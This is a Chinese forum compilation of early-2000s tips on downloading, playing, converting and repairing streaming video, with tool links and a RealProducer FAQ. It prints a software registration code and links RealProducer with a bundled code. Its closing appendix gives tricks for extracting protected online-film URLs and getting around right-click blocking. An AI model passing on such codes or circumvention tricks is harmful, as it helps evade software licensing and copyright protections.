http://www.netants.com/download/netants_gb2312.zip
网际快车 V1.2：
http://ark.hit.edu.cn/Soft/Network/flashget12.zip
解压缩软件：
WinZip8.1[压缩]：
http://ark.hit.edu.cn/Soft/Wintools/Winzip.exe
WinRAR3.0[压缩]：
http://ark.hit.edu.cn/Soft/Wintools/WinRAR.exe
--------------------------------------------------------------------------------伤心：
如果你在用Media Player播放影片时只有声音没有图象，那就安装这两个插件试试。
http://www.skyhits.com/movies/tools/mpeg4.zip
http://www.skyhits.com/movies/tools/divx.exe
-------------------------------------------------------------------------------
越想越伤心：
1、下载方法如下：移动鼠标到连接上,单击鼠标;或者使用专门软件.如网络蚂蚁、网际飞车flashget，你可到以下地址下http://www.download.com.cnhttp://www.sina.com.cn ;
2、有可能出现无法下载的情况,这是因为同时下载的人太多, 你稍候再试; 或者是连接发生错误,请你尝试别的连接.
3、观看电影的方法: ASF MPEG MPG AVI文件使用Windows media player;并且下载最新的divx插件;MOV QT文件使用QuickTime; RA RM使用Real Player;Vivo文件使用VivoActive Player;VDO文件使用VDOPlayer.如果影片只有声音没有图像,说明你的媒体播放器过于陈旧,请下载最新的软件,并且下载最新的插件.以上网站如果无法访问,可以到以下站点搜索http://www.download.comhttp://ww ... m-software-play.htm
4，推荐用StreamBox VCR 1 Beta 3.1 中文版下载，我试过都能下，该软件下在地址为http://www.32505.com/soft/StreamboxVcrSuite.rar
制作工具
1.RealProducer Plus v8.5（内含注册码)
这是Real公司出品的RM制作最强大的软件了。千万记住 RealProducer。这个软件有很多版本，一定要用 Plus 版的！！！它是同类软件中最好用的，软件容量不大，功能专业专一而强大，又是Real公司这个RM的鼻祖出品的，非常好的制作RealMovie的软件。
http://66.54.221.196/tool/plus.zip。
2.Real格式文件压缩至尊v1.40注册版
软件大小：2448K
更新时间：2001-5-12
注册码：TianYusoftware is good
ftp://61.139.37.147/rj/soft/tyureal.exe。
3.把两个MPG合成一个MPG的方法
在dos下
copy /b 1.mpg+2.mgp final.mpg
4.如何合并多个内容连续的rm文件？
与分割RM一样，用RealProducer Plus 软件
File->Edit Realmedia File，打开Realmedia Editor，然后File->Open Realmedia File，从目录中找到要合并的第一个RM文件并打开，接着File->Append Realmedia File，从目录中选要合并的第二个文件并打开，如有第三第四类推，这时已经合并好了，File->Save Realmedia File As，取个名字，哈哈，大功告成。
5.怎么开ftp服务器？
请看：http://wwwb.pconline.com.cn/pcedu/soft/doc/serv-u/1.htm。
                      流媒体技术常见问题解答
http://www.ccidnet.com/html//tech/n...18/58_3489.html。
（InfoCD　2001年10月18日 18:23）
0.如何解决双声道的问题？
答：一些文件如.rm和.asf有的时候国语和奥语是混合在一些的，而realplay、windows media play一般都是不能分开声道的。其实你可以采用如下简单的方法解决：双击任务栏上的喇叭图标，然后将Wave Output（声音输出）向右（或者左）播到头即可解决。但这并不是100%全能解决的，一些电影文件是无法解决这个问题的，只能认命了。目前realfox软件也可以解决双声道问题，但它采用的方法也是和前面所说的一样，因此也不是100%能解决问题了。
1.rm格式的文件能下载下来吗？
答：当然了，用Streambox VCR就可以，这个软件的套装可以在本站找到，名字是streamboxvcrsuite1.0。
2.能将mpeg文件直接转换成wmv（wm8）格式的吗？
答：至今为止还不行，还是要经过avi的中间步骤的.....不过可以让几个软件协同工作来提高工作效率，当然你还是要准备一块大硬盘的。
3.我用StreamBox下载的ASF文件，播放时快进后退键全都失效。
答：有两个方法来解决：（1）用windows media player6.4来播放，就可以正常拖动了；（2）把asf文件用virtualdub转换成avi文件后便可以在mediaplayer7.0里看了，而且可以选段看，且不会等候，只是7.0占用资源比较高，建议还是用6.4看。
4.如何把rm文件转换为mpg文件？
答：现在还没有比较完美的解决办法，能凑合用的办法有两个：（1）用抓屏软件，例如hypercam，snagit等等，抓取播放中的video/audio成为avi文件，这个过程中可以选择codec，所以可以适当的减小avi的大小，之后可以把avi->mpg；（2）用tira直接转换rm->avi，不过你也要准备个大硬盘，因为转化出来的是没有压缩的avi。
5.wmv8中在压缩设定的时候一项叫做two-pass，是做什么用的？
答：第一次所谓的编码就是做分析。即对整个被制作的video进行扫描，以确定video中哪些镜头是相对动态，哪些镜头是相对静态！因为相对静态的片段需要的码流速率相对低甚至低很多，这样他就利用一定的算法把临近相对动态的片段部分的数据插进来。插进来的数据和一般数据一同被LOAD进BUFFER，回放的过程中再插回动态的画面中。这样就巧妙的利用时间差充分的利用带宽使得动态效果达到最好！于是所谓的first pass就是分析并判断video转换成数据流的“均衡”，然后second pass才是真正利用first pass中分析的结果开始encode！由于需要经过这两个过程所以two pass encording所需要的时间大约是普通编码时间的两倍！real在VBR和two pass技术上的成熟，所以尽管MS最近在MEDIA8中宣称也利用了以上的两种技术，但在动态的VIDEO上的表现任远远不及REAL。在大动态的镜头中体现得更加明显，MS'VIDEO8容易产生大量马塞克，而real就处理得很平滑而且动作也更连贯！
6.Streambox VCR应该设置怎样的代理服务器？
答：在菜单里面就有的：view->setting->proxy。
7.请问如何用把超过700Mb的asf文件切成小的asf？
答：其实最好在制作asf的时候就把这个计算好（类似于divx的bitrate的计算）。可以用asfindexer（这个软件在windows media tools4.1里面有）试试。
8.请问rm文件用什么软件编辑？
答：你只要装上了RealProducer8.5plus，就可以编辑了。菜单File-Edit RealMediafile...
9.请问怎么把多个RM文件合成一个完整的文件？用什么软件？
答：方法同上，不过在进入Edit RealMediafile里面之后要用append来追加.......
10.请问微软媒体播放器播放的影片用扫描软件抓屏，realplay的可以，但WMV等用微软媒体播放器的为何就不行呢？
答：准确来说，WMV比REALPLAY的屏幕更难捕捉，为了显示效果，两个软件都用了一些很特别的显示方法来显示图形（REALPLAY和一些机器不兼容也是因此而来，这方面有系统代码的MEDIAPLAY占的便宜实在太大了）。所以用一般的截图软件是很难截取到它们播放中的图形的，就像以前DOS下的“直接写屏”技术，比较极端的技术要抓起来麻烦多了，好在HyperSnap-DX Pro等软件的DirectX支持功能还能有时候发挥点用处，把ASF和WMV的图给搞定，但REALPLAY就没办法了。最近听说“东方影都”能支持RM文件播放时候的截图，我也没测试过，但我想如果能截就可能不是采用REALPLAY的那些显示技术了，图像质量也应该打点折扣了。大家看到我的文章上的截图了吧，呵呵我是如何截REALPLAY的呢？其实是一个笨办法，一个不算是办法的办法。。。也不好意思献丑了。
11.请教一下：用下载的ASFCUT时总提示WMVCORE.DLL是怎么回事？
答：把WINDOWS MEDIA ENCODE7装上就行了。
12.我用wm7作的.wmv,与asf有什么区别？
答：两种文件采用的codec不同，wmv一般是采用window media video/audio 7的，asf采用的一般是Microsoft MPEG4 V（3/2/1?），音频部分是windows media audio v2/1。不过现在网上有些地方的asf，wmv采用的codec有些混乱了，所以两种文件的界限也有些模糊了。
13.我用Real Producer Plus 8.5，把VCD格式转换成RM。但用Real Player 8，看时，就要我上网下载更新才能看，怎么办？
答：请下载最新版本的RealPlayer8...
14.在宽带平台下，是rm的效果好还是asf的效果好？asf能做到mpeg4的近似DVD的效果吗？
答：这个问题当初提出来的时候，争论了很久，各执一词，wmv8和rm都有支持者，看来不同的制作方法，不同的人（主观印象？），结果只能是不同了：（所以我就顺便说说自己的看法吧（我考虑的是低码率，225kbps左右），rm似乎在图像的柔和度上面下了很大的功夫，wmv8则是一上来就以图像的清晰度见长（感觉就是制作的时候把quality调到0也比rm强一点，不过似乎有些地方处理起来还是有问题，当初曾经压缩过一个游戏的avi，源文件压缩之后wmv8里面有很多的色斑，改用rm之后一切正常...
15.我用VirtualDub 1.4D在读源文件时经常出现MPEG Import Fileter:unexpected end of file在转换为AVI时经常出现sync error，为什么？
答：这个是因为你的mpg源文件不是标准的mpg格式，请用超级解霸的mpg格式处理功能进行转化，出来的mpg就可以正常使用了,也可以用M1-edit（M2-edit？）来处理.....
16.请问各位前辈，有什么方法可以预处理.mpg文件，去出错误？（当然我的.mpg copy到handdisk时并不很顺畅）
答：回答同上。
17.我用media encoder utility 8压缩的wmv的图像居然是反的，人物都大头朝下了，这是怎么回事？是不是参数设置有问题？以前用wm8 beat2很正常的呀。
答：可以参看下面微软的回答.....以下是在该产品帮助中的faq中有的：Why is my encoded video upside down when I play it back in Windows Media Player? Occasionally, encoded video will be upside down when it is played in Windows Media Player because capture card drivers interpret the packed YUV file FORMat in different ways. （是由于捕获卡驱动解释方面的原因）Windows Media 8 Encoding Utility enables you to set a registry key that will flip the video before encoding it so that it displays correctly. By default this feature is disabled. To enable this feature, use the registry editor to locate the registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Scrunch\WMVideo\Vertical Flip Packed YUV, and then set the DWORD valuesss of this registry key to 1。（即可以将以上键值改成1解决）
18.请问怎样把asf和wmv转换成avi的文件？
答：如果可以用virtualdub1.3c（或者支持asf的1.4版也可以）打开的话，就简单了，video/audio都选择direct stream copy，然后save as成avi就可以了。不过vd好像对于asf支持的好一些，我试过对付wmv好像不行。另一种方法是用graphedit来转换，这种方法通杀wmv、asf。
19.装了windows media player7.0之后，我还可以用windows media player6.4版本么？
答：当然了。那个6.4版本已经被升级成了6.4系列的最高版本了。这个程序的位置是C:\Program Files\Windows Media Player\mplayer2.exe。
20.为何我的RealProducer8.5Plus看不到下面的一些菜单和按钮了呢？
答：这个是我自己机器上面的毛病，因为本人用的win98SE里面的字体选在“大字体“，换成“小字体“就正常了。分辨率800x600@75hz-16bit。
21.如何调整realproducer plus制作RM文件时的码率？
答：实际上你可以自己设定RM文件码率的！realproducer plus提供的那8种码率只是real公司预先设定好的建议值而已，而这些建议值是可以自己改的，方法是在realproducer plus的界面上选：Options->Target Audience Settings->or RealVideo Clips...->Target Bitrate->Target Bitrate！用这个方法你可以把原来默认的LAN设置码率改为1.2M，然后在producer界面处的Target Audience也选择用LAN来压缩，那么你做出来的节目就是1.2M的码率了。
22.请问要选择什么样的影像采集卡？
答：现在市场上的影像采集卡有很多种，但是要记住！一定要购买可以抓取AVI格式的卡，千万不要买抓取MPEG格式的卡，这可是没有办法作随选视频的，因为MPEG格式是专门制作VCD或DVD用的，但也不是说买了可以抓取AVI格式的卡，就可以作随选视频了，因为还是有些蛮便宜的影像采集卡，品质也不错，而且抓取的影片也不会有漏格，有的厂商产品使用的AVI格式的规格是自己规格，随选视频必须是Microsoft Video 1规格的AVI，不是这个规格的AVI采集卡，千万不要买，会产生许多问题。
23.请问要选择什么样的声音采集卡？
答：没有所谓的声音采集卡，因为声卡就可以采集声音，建议您选择品质比较好的声卡，最好是16位以上的声卡，推荐创新声卡，因为它对Windows系统会有比较好的支持。
24.微软网站一直强调Windows Media 4.x的压缩格式是MPEG4，这不就是VCD的格式吗？
答：MPEG是一种影片压缩格的技术，VCD则是利用MPEG1或MPEG2的压缩技术来制作，而DVD是利用MPEG2的技术来制作，这次Windows Media 4.x的技术是使用MPEG4，这不是微软的专利，是经由全球各大厂商组织协会制定出来的，未来使用MPEG4的压缩技术来制作影片的产品一定会很多，原因是这个规格的影片品质及文件大小都非常精致，所以并不排除以后VCD或DVD会使用MPEG4。
25.为什么要学习影片编辑软件？
答：很多时候我们可以直接使用Windows Media Tools抓取随选视频或音频（ASF网络影片或声音），但更多时候，可能取得经过编辑过得影片来源，譬如说我们要拍摄公司简介、商品简介或者教学记录等等，通常是东拍一段西拍一段，然后经过影片编辑软件抓取影片及剪辑影片，所以学习影片编辑软件是十分重要的，一般只需能进行影片的编辑就可以了，不需要学到电视、电影的高*技术。
26.安装软件一定要有顺序吗？
答：最好按顺序安装IE→Powerpoint 2000→Adobe Premiere 6→Media Play→Media Tools→Media on-demand Producer→Media Server。
27.如何调整realproducer plus制作RM文件时的码率？
答：实际上你可以自己设定RM文件码率的！realproducer plus提供的那8种码率只是real公司预先设定好的建议值而已，而这些建议值是可以自己改的，方法是在realproducer plus的界面上选：Options->Target Audience Settings->or RealVideo Clips...->Target Bitrate->Target Bitrate！用这个方法你可以把原来默认的LAN设置码率改为1.2M，然后在producer界面处的Target Audience也选择用LAN来压缩，那么你做出来的节目就是1.2M的码率了。
28.流媒体整个制作流程是什么？
答：这个流程分为3个方式：
A.需要拍摄影片或录制声音之后再作随选视频或音频
流程为：拍摄影片或录制声音→到电脑上采集影片或声音→使用影片编辑软件编辑影片和声音→输出编辑完成的影片和声音→到Windows Media Encoder软件转换成网络影片或声音→放置影片和声音到网络上→制作Homepage来连接完罗影片或声音。
B.如果已经有影片或声音来源，可以直接抓取随选视频或音频
流程为：将来源和影片装到放映设备上→到Windows Media Encoder软件直接抓取成网络影片和声音→放置影片或声音到网络上→制作Homepage来链接网络影片和声音。
C.影片和声音的网络Live直播
流程为：将来源的影片和声音装到放映设备上（或架设摄像机并连接到电脑）→利用Windows Media Encoder软件直接抓取成网络影片或声音→设定Windows Media Server→制作Homepage并连接到网络Live影片或声音。
29.最近很多朋友来信问我为什么自己的机器在播放MPEG4文件的时候速度跟不上，出现了跳帧（也就是画面播放起来不连贯）现象，感觉就像是当年在486-DX100上用XING PL AYER看VCD一样！
答：“理论上，播放MPEG4对机器的要求并不算高（相对最近普遍的新装机器而言）， CPU只要是300MHZ以上（不管你是PII, CELERON, PIII, K6/2, K7, K6III, CYRIX）再配上64兆的内存和一个8兆显存的显卡就可以流畅的播放了。但大家要明白，世间兼容机何止千百台，所以，出现这样或那样的问题，并不奇怪。如果认为自己机器的CPU速度没问题，那最好请在显示卡上找找原因。还有就是，以现在的MPEG4的播放解码技术（现在可以拿到的播放软件）来看，只要MPEG4的分辨率和码率提高一个档次，相应的对硬件的要求就要高很多，特别是在大动态画面的情况下。所以大家有两个方法：一个是换机器，另一个是等播放程序的慢慢成熟。”但，大家注意到了吗？上面这段话说的配置里面没提到声卡 -- 一个好象和播放速度没多少关系的配件！
    经总结，来信的大部分朋友都是栽在这个毫不起眼的声卡上面的，为什么咧？且听我慢慢道来，据我测试，ALS007之类的廉价声卡在进行MPEG4播放的时候，就会出现上述的跳帧现象，而S90之类档次的声卡就没这个烦恼。如何判别自己的声卡能不能胜任MPEG4的播放呢？（其实是MP3的播放）最简单的测试方法是：你在用《超级解霸》播放VCD的时候如果在音频选项里面不能选择“精密44100赫兹”的话，那么你的声卡在播放MPEG4的时候就多半会不连贯了，而且音频方面的不连贯还会直接影响到画面的显示。哪怕你的显示卡是GF256，只要声卡是007的话，播放的时候一样会跳帧！
    在《超级解霸》里面我们可以选择“正常22050赫兹”来降低采样频率，用牺牲质量的方法来保证音频和视频的连续，同样，在播放MPEG4的时候我们也可以采用这个方法来解决。问题在 WINDOWS MEDIA PLAYER 里面，好象没这个选项，且慢，有的，你没发现而已。下面请跟着我一步步来，选择MEDIA PLAYER的主选单的[文件]选单，再选里面的[属性]。
    注意，在选择的时候一定要把正在播放的MPEG4停下来，接着，你就会看到一个叫[属性]的窗口弹出来，选上面的[高级],看到那个MPEG Layer-3 Decoder的选项了吗？就是它了，选中它后，按下面的[属性]按钮，选 Statistics 可以看到正在播放的MPEG4文件的音频部分的采样频率等等信息，但我们这次可不是光来看的，所以不理它，选择 Quality 后，我们就来到了目的地！
    [Frequency]里面的三个选择你可以选择 HALF （1/2） 或 QUARTER （1/4），选择后，按[确定]后，再播放一次MPEG4看看情况有改善与否，如果没有或者你认为你的声卡真的很次的话，那我干脆推荐你把 [FREQUENCY] 选 [QUARTER]、[STEREO MODE] 选 [DOWNMIX]、[RESOLUTION] 选 [8 BIT]！为了不跳帧，为了声音能连续，还管它什么立体声和 16BIT呢！有总比没的强！谁叫你的声卡不争气，怪不得MPEG4的 ；）
    按上面的方法做完后，如果跳帧的问题得到解决的话那就最好，如果还没改善，那我想你只有升级你的机器了。如果你想看看到底牺牲了音频质量后，速度有多少改善，你可以到[文件]--》[属性]-->[高级]里面选 Video Renderer （上面的图有），接着就会看到一个如下面的窗口： 自己前后对照一下就可以知道效果了！
    其它详细的数据我就不多说了，只是想说说，我用这个方法使一台MVP4配K6-2-300（显示卡、声卡主板带，显存5M）的机器能够流畅的播放MPEG4！最后，祝大家都能欣赏到流畅的 MPEG4！
30.有没有VOD格式的介绍?
答：简单地说，VOD是视频点播。用Media Player 7以上的版本就可以播放，不过大多数播放前需要VOD站点的认证许可；如果你没有，又没有破解的话，就不要下载。详细地说，VOD是一种过时的流媒体格式，多见于早期的网络视频点播系统中（例如一些XXX网站）。据说开发它的公司已经倒闭，所以今后是没什么希望啦。它有专用的播放器VODLive Player，IE和NETSCAPE加上插件后也能放。再有就是Media Player 7以上的版本好像也能放。但比较麻烦的是它可以被设定授权后才能看，并且我转了少不地方，始终没发现有能够破解的手段，所以用户手上如果没有有效的“证书”，很可能抓回VOD文件后还是看不了VOD的全称是Video on Demand，意即按需要的视频流播放。当您打开电视，您可以不看广告，不为某个节目赶时间，随时直接点播希望收看的内容，就好像播放刚刚放进自己家里录像机或VCD中的一部新片子，但是您又不需要购买录像带或者VCD盘，也不需要录像机或者VCD。信息技术的梦想就是通过多媒体网络将视频流按照个人的意愿送到千家万户。只有利用终端设备，使用者才能与某种服务或服务提供者进行互操作。实际上，在计算机系统中，它是由带有显示设备的PC终端完成；在电视系统中，它是由电视机加机顶盒（SettopBox）完成；而在未改造的电话系统中，它是由电话预约完成。 在客户终端系统中，除了处理硬件问题外，还需要处理与之相关的各种软件技术问题。例如，为了满足用户的多媒体交互需求，客户系统的界面必须加以改造。此外，在进行连续媒体演播时，媒体流的缓冲管理、声频与视频数据的同步、网络中断与演播中断的协调等问题都需要进行充分考虑。
31.有没有如何修复rm文件的介绍?
答：下面是修复rm的工具下载地址及用法：
http://cool.sj.net.cn/%7Esouxin/software/rmfix-souxin.zip
要点：rmfix可能会对rm文件造成永久性损坏，所以在使用rmfix之前把要修复的rm文件做份。
第一种情况：一个完整的rm文件，但只能播放一部分
1：把rm文件拖拽到rmfix程序图标上(注：也可以命令行方式，例如："rmfix c:\movie\a.rm"
2：这时候rmfix会以dos模式运行并显示出一个菜单，按"A"键切换到自动修复模式。
3：按"2"开始检查所有的数据块，rmfix开始扫描整个文件(需要扫描几分钟时间)
4：当rmfix扫描到一个损坏的数据块的时候，扫描会暂停，按"Y"修复这个块。
5：当数据块扫描全部结束时(按回车键回到主菜单)，按"5"开始重建索引数据(注：播放rm文件无法拖拽时间条就是因为索引数据出错)
现在这个rm文件就能够正常播放了。
第二种情况：修复一个不完整的rm文件(例如一个没有下载完全的rm文件)
1：把rm文件拖拽到rmfix程序图标上(注：也可以命令行方式，例如："rmfix c:\movie\a.rm"
2：按"C"开始数据块扫描。
3：当rmfix扫描到一个损坏的数据块的时候，扫描会暂停，按"Y"修复这个块。
4：数据块扫描完成的时候rmfix程序结束，这时再次把rm文件拖拽到rmfix程序图标上。
5：按"R"重建索引数据(有索引数据的rm文件在播放的时候才允许使用快进、重放、时间条拖放等控制功能)
http://cool.sj.net.cn/%7Esouxin/software/rma02501-souxin.zip
我自己根据用的情况发现用了rmfix后，很后悔，几个rm文件再也会不来了。后来我就决定自己找一个rm修复软件，终于用google找到了这么一个站点：http://www.anime.com.ua/misc/alexey/rma.htm
还是命令行方式的，不过很简单，手册很详细。
一般我们用只需要两个参数，-f和-i。
-f是修复，如果我们下载的rm文件不全，就可以用到它了，它与rmfix最大的不同在于，rmfix在遇到第一个timestamp就停下来，这样就会发生一个几百兆的文件只能播几分钟，rma会继续修复下面的内容，rma的使用很简单，rma -f 坏的文件详细地址，如果出错"Could not open file. Error 255: Undefined error"，可能原因，地址错，文件只读；
用rmfix修复索引的人可能会发觉，修复后rm文件有一顿的感觉，就是拖到播放的位置，它的画面相应比较慢，声音已经出来了，画面不动，2、3秒后才出现。用rma就不会有这个问题，用法rma -i 文件名，如果文件有损坏，它会提示先用rma -f。
然后是速度问题，我是受不了rmfix的速度，上完厕所一个文件还没有扫描完，rma就不会了，你还没有起身就好了。当然，rma也会有危险的，如果一个文件的tiemstamp太大，也有可能出现只修复第一段，这个可能以后的版本会改观。rma还有分割文件，合并文件的功能，不推荐大家使用，用realproduce就好了，作者也是这么说的。
视频格式之间的转换
    常见的视频格式有很多，如果你稍微了解一点儿视频知识，就应该不会对诸如AVI、MPEG、MOV、RM等常见视频格式感到陌生。兵来将挡，水来土掩。什么格式的文件就有什么样的播放器对应：MOV格式文件用QuickTime播放，RM格式的文件当然用RealPlayer播放。但假如你的爱机中只装有RealPlayer播放器，而你所得到的却是一个MOV格式文件，此时你跟谁急都没用。最好的办法就是要找到这两种视频格式之间的“桥梁”从而实现互相转换，你也就可以美滋滋地欣赏精彩的视频文件了。
    AVI→MPEG(MPEG－1)
    AVI和MPEG应该是很常见的视频格式了，所以格式转换的软件颇多，有bbMPEG 1.23、Honestech MPEG Encoder 1.1、TMPGEnc beta 12a等等。这里我们介绍的是Honestech MPEG Encoder 1.1，它能够帮你把AVI视频文件转换成MPEG视频文件的软件，由于使用了一种特殊的编码算法，使得转换文件的工作能够更快速、准确地完成。虽然编码特殊，但你大可不必担心操作步骤过于复杂，因为该软件有着简单的操作界面，只要选择想要转换的AVI 视频文件，接着设置转换文件的存档名称和保存路径，即可以开始转换文件。另外推荐的是Panasonic MPEG1 Encoder 2.51，这是日本松下公司所研制的AVI转换MPEG－1软件，如果你有纪念性的家庭录影带，可以事先转换成AVI格式，再用此套软件将它转换成MPEG－1格式，然后用刻录器将MPEG－1格式文件刻录光盘片，得到的就是普通的VCD光盘了，可以拿到任何VCD播放器上播放。
    MPEG(MPEG－1)→AVI
    常用的软件有Honestech MPEG Recoder 1.0、VCDGear (GUI) 2.0 Final等等。这里推荐使用的软件是Honestech MPEG Recoder 1.0，因为它可以在播放影像文件的时候记录和捕捉活动的图像数据，而且在保证高质量的情况下实现从MPEG到AVI文件之间的转换，为磁盘节省了不少空间。如果你要求稍高一点，可以试用一下VCDGear，它在从VCD中转换出MPEG影像时可以修正MPEG中含有的错误。
    MPEG(MPEG－1)→ASF
    要将MPEG－1格式的影像文件转换成微软的ASF视频流格式文件，所需要的软件工具有：Sonic Foundry Stream Anywhere、Windows Media Toolkit等等。因为需要ASF压缩编码驱动库的支持，首先必须安装Windows Media Toolkit。然后运行Sonic Foundry Stream Anywhere，从中打开你的MPEG文件，将之另存为ASF文件就可以了。注意设置一下生成ASF的参数，最佳的是在320×240和30帧/秒的情况下。
    ASF→MPEG(MPEG－1)
    将ASF视频流格式的影像文件转换成MPEG格式的影像文件需要借助于AVI格式这个“桥梁”，推荐使用以下软件组合：DVMpeg 5.0＋，VirtualDub，Windows Media Tools。首先启动Windows Media Tools和DVMpeg，再运行VirtualDub，打开你想转换的ASF文件，处理后将生成的AVI文件保存到一个文件夹，然后DVMpeg就会自动把它转换成MPEG文件。当然，条条道路通罗马，除了上面介绍的方法外，你也可以借助其他软件工具把ASF文件转换为AVI格式的文件，再使用相应的软件把AVI转换成MPEG格式。由于ASF视频格式的先天限制，一般来说它的图像质量往往比不上MPEG－1，所以转换之前，请三思而后行。
    MOV→MPEG(MPEG－1)
    要将MOV格式转换为MPEG格式，需要以下几个软件协同工作：Adobe Premiere、Panasonic MPEG。先请安装好Adobe Premiere和Panasonic MPEG驱动程序，运行Adobe Premiere，新建一个Project（工程项目），用导入命令导入一个MOV文件（如果你不能导入文件的话，请先完全安装Quicktime 4.0 Player），然后将之导出MPG文件，注意文件类型选择为“Panasonic MPEG1”。这里所说的MOV格式是指用Apple的Quicktime 4.0做出来的MOV格式，如果是用Quicktime 3.0生成的MOV格式文件，用Panasonic MPEG可以直接打开。
    MPEG－4→MPEG－1
    将MPEG－4格式文件转换成MPEG－1文件推荐使用Panasonic MPEG Encoder 2.2＋和Divx－Codecs。首先要安装Divx－Codecs驱动程序，这个东东就是DivX的压缩编码器，然后启动Panasonic MPEG Encoder 2.2＋，选择待转换的DivX文件，接下来可以调整视频文件的尺寸和压缩比例，甚至还可以控制是否加入交错平滑处理和为视频文件加入黑边等等，可以按照自己的实际需要来选择。最后确认压缩就完工了。
    DVD(MPEG－2)→VCD (MPEG－1)
    由于DVD驱动器尚未普及以及DVD光盘成本昂贵等客观原因，DVD影片一直未能像VCD一样流行。但我们可以将喜爱的DVD影片转换成MPEG－1格式的视频文件，留在硬盘上观看或是刻成VCD光盘。DVD转VCD的软件并不多，这里推荐的是DivX DVD影像编码软件，可以在http://www8.sdnet.gd.cn:82/DivX.htm 处下载得到。这绝对是一个出色的影像压缩转换程序，它能够将DVD影像复制并压缩为标准650MB CD－ROM格式的影像压缩软件。不过这样做可能会对DVD的版权造成无法预料的影响。
    VCD(MPEG－1)→MPEG－4
    把VCD 转成 MPEG－4 第一步就是要把 VCD 的 DAT 文件转成一般视频软件都认识的 MPEG－1 格式，要完成这个任务，最简单直接的方法就是利用《超级解霸》转录功能，将所需部分转录成 AVI 文件，并保存起来备用。第二步需要用到的软件是VirtualDub 1.3，这个软件的速度和方便性都是一流的，所以大家如果没什么特殊要求的话，推荐使用。在进行 MPEG－4 的编码压缩工作之前，切记事先需安装了 DIVX MPEG－4 的压缩编码驱动程序，否则不可以进行MPEG－4的转换。还有一个与VirtualDub 1.3功能差不多的软件是Vcdgear 2.0(http://www.vcdgear.com)，也值得一试。把VCD转为MPEG－4的好处是压缩后只占原来的1/3的容量，但图像质量却没有什么损失。
    此外还有XingMPEG Encoder 2.2，它可以将AVI、MOV等多种格式的视频文件转换成为MPEG格式，根据它的向导提示，可以很容易地完成格式转换的过程。它的功能非常强大，而且操作简便，是被普遍看好的一款工具软件。可以实现的功能很多，包括将AVI文件转换成MPEG格式，将WAV格式的音频文件转换成为MPEG格式音频文件，而且还可以建立符合MPEG－1标准的VCD、CD－I Movies等格式，支持苹果公司的QuickTime 格式的MOV文件转换为MPEG格式。除此之外，还可以录制的文件包括MPA/MP3(audio), MPV(video)等。其网址为http://www.xingtech.com/。单击[New]命令按钮，弹出任务向导对话窗口)，选择PAL制式，单击[下一步]按钮，在接下来的对话窗口中设定好视频源文件和输出文件名称，最后单击[完成]按钮即可。
    除了以上介绍的方法外，和音频格式转换一样，你如果有专门的视频编辑软件的话（如Ulead Mediastudio、MainActor等等），也可以把它们当作格式转换软件，只要是视频编辑软件能打开的格式，你就可以把它另存为它所支持的另外一些格式，这也不失为一种方便快捷的方法。比如MainActor就是一款极好的动画视频格式转换和编辑剪接工具，可以实现AVI、MPEG、MOV等格式之间的互转互用。
网上电影下载播放指南(入门篇)
(一)下载
1.http,ftp协议
这个无需多说，用网络蚂蚁,快车,等工具往回拖就是，注意有些服务器只支持一个线程，多线程情况下会封IP，在设置栏将数目设为1即可
rtsp协议
real文件的实时流协议，你看到的很多rm电影都是基于这种协议，下载工具为Streambox VCR，Streambox VCR支持断点续传，操作非常简便，简单的说，你点击它主界面上的“+”号，填入url即可。
有时直接将rtsp改为http用快车也行.
Streambox VCR 中文版
http://download.qiandao.net/downsoft.asp?softID=1256 ;
3.mms协议
微软的实时流协议，网络上很多asf或wmv格式电影基于这种协议，下载工具同样为Streambox VCR，另外你还可以使用的工具为Stream Download Project，Stream Download Project简称SDP，对采用[mms://]开头的下载网址，SDP让你突破限制，顺利将影片下载回来。支持ASF、ASX、WMV 格式。
Stream Download Project汉化版
http://download.5iyt.com/SoftView_1194.htm;
对付流媒体最近出了个新秀叫net transport,几乎所有流媒体通吃,强烈推荐,但有一点需注意,有时它下不来应该再用其他软件试试因为nettransport对协议支持的并不完善!
二，播放
rm电影用realplayer播放，asf、wmv电影用Windows Media Player播放，这个大家都知道，遇到无法播放的情况，请首先更新自己的播放器。如果你使用realplayer8.0，建议下载realone v2.0使用,它可以播放目前所有 RM 文件，包括采用最新的 RealVideo 9.0 编码的文件。而Windows Media Player目前的9.0Bata版在xp下反响也不错，建议更新。另外，网络上还有mpeg-4格式的高清晰格式电影，后缀名为.avi，这时你首先需要在系统内安装DivX解码器，然后就可以用Windows Media Player流畅的播放了。
DivX解码器
http://www.newhua.com/divx.htm;
三;修复
网络上下载的电影常常会出现一些问题，如无法播放，无法拖动进度条等等，如果是rm电影，你可以使用Rmfix修复，把要修复的rm文件拖拽到rmfix程序图标上即可。asf文件可以用Asf Tools修复。Asf Tools能直接针对ASF及WMV流媒体进行修复、合并及切割等动作。
RMfix
http://www.21cndigital.com/06service/file/6201.asp（这里面讲的很清楚） ;
Asf Tools 完全版
http://www.pconline.com.cn/pcedu/soft/gj/media/10201/30025.html（这里有下载的东西，还有学习的东西）;
注意:
如Realplayer出现以下信息请夜深人静时再试:
Server has reached its capacity and can serve no more streams. Please try again later.
如Windows Media Player出现以下信息请夜深人静时再试:
附1:在线电影的破解技巧
其实稍懂一点网页制作的朋友都知道破解在线电影的最好方法就是把页面保存下来，然后用网页编辑软件将保存的页面打开，再找出其中的url链接即可
这显然是一个很不错的办法，但也有不管用的时候，有些网站，特别是官方网站，会千方百计地让你无法下载网页或是查看源代码，如在源代码中加以限制，右键的屏蔽，使用java链接，使用控件播放，或是php,asp等动态网页技术等
方法1, 掉线法.之前最好有个理想的播放器，这里建议使用realone player,它是目前最好的网络流媒体播放器，几乎支持所有的媒体文件格式。掉线法,顾名思义其实很简单，下面说一下方法：首先用realone播放你想要的文件，然后打开网络连接属性窗口，把本地连接禁用，或者你用防火墙的禁止访问也可以，只要令其掉线就可以，马上就会弹出一个窗口，里面就是文件的真实地址（有时也不一定，但给出的连接一定有用！）
如果没有，那就选择play-->previous clip窗口就会老老实实的弹出。
方法2 ,脱拽法,可以简单的使用拖放方法将连接拖至flashget或是netants的浮动窗口就，可以再新建下载任务框中得到连接*注:虽然很多人都知道，但还是先在这里先介绍一下破屏蔽右键的方法，可以先点住右键不放，这时会弹出警告框，然后将鼠标移动到确定按钮上点击,然后回到你所选的目标上松开右键,看看是什么.
下面说一下媒体指向文件，这些文件的后缀名通常是.asx .pls .smi .ram
